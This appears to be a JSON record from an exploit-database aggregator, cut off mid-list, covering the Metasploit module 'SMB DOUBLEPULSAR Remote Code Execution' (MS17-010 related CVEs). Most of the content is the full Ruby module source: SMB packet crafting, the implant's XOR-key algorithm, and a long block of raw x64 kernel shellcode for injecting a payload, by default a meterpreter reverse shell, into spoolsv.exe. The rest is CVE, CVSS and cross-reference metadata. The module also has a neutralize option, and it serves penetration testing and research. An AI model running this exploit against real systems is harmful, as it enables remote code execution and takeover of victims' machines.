"SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:24:02", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-29T22:24:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-30] #"}, "lastseen": "2021-09-29T22:24:02", "differentElements": ["sourceData"], "edition": 29}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "d0a2939c371f782cf16317767a0c287b", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-30T22:14:19", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": 